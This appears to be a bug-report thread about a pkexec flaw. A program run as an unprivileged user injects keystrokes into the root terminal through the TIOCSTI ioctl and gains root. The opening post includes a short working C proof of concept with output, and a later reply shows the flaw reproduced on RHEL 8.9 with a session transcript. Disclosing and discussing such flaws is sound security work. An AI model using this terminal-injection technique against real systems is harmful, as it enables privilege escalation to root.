When executing a program via "pkexec --user nonpriv program" the nonpriv session can escape to the parent session by using the TIOCSTI ioctl to push characters into the terminal's input buffer, allowing privilege escalation. This issue has been fixed in "su" CVE-2005-4890 by calling setsid() and in "sudo" by using the "use_pty" flag. $ cat test.c #include <sys/ioctl.h> int main() { char *cmd = "id\n"; while(*cmd) ioctl(0, TIOCSTI, cmd++); } $ gcc test.c -o test $ id uid=1000(saken) gid=1000(saken) groups=1000(saken) # pkexec --user saken ./test ----> last command i type in id # id ----> did not type this uid=0(root) gid=0(root) groups=0(root)
You have to possess CAP_SYS_ADMIN to successfully invoke the TIOCSTI ioctl. That implies to me that pkexec is allowing test to execute with that (and possibly other) capabilities. If that's the case, you're merely running as root by another name.
Or you can pass that tty ownership check that's been in there seemingly forever... sorry for the noise.
Has this actually been fixed? On a RHEL 8.9 system I've built the sample exploit from https://ruderich.org/simon/notes/su-sudo-from-root-tty-hijacking and it works: root@myhost:/var/tmp/tiocsti130# pkexec -u nobody /bin/bash bash-4.4$ /var/tmp/tiocsti/tiocsti # <-- this is me running the exploit, subsequent output is caused by the exploit hijacking my terminal exit echo Payload as `whoami` bash-4.4$ exit exit root@myhost:/var/tmp/tiocsti# echo Payload as `whoami` Payload as root